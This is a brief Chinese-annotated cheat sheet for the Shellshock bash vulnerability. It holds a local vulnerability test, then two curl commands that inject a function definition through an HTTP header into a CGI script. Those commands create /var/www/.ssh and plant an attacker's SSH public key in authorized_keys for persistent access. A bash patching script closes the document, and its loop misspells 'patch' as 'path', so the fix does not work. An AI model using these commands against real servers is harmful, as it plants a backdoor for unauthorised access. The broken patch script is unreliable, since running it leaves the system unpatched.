echo $shell
#查看当前用户的shell
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
#定义了一个名字叫x的变量,内容时单引号内的。
exploit:
curl -H 'x: () { :;};a='/bin/mkdir /var/www/.ssh';echo "a: $a"' 'http://www.example.com/cgi-bin/test.cgi' -I
curl -H 'x: () { :;};a='/bin/echo "rsa公钥" > /var/www/.ssh/authorized_keys';echo "a: $a"' 'http://www.example.com/cgi-bin/test.cgi' -I
修复漏洞脚本:
#!/bin/bash
yum -y update && yum -y install build-essential gettext bison
wget http://ftp.gnu.org/gnu/bash/bash-3.2.tar.gz
tar -zxvf bash-3.2.tar.gz
cd bash-3.2
for i in $(seq -f "%03g" 1 53);
do
wget -nv http://ftp.gnu.org/gnu/bash/bash-3/gnu/bash/bash-3.2-patches/bash32-$i
path -p0 < bash32-$i
done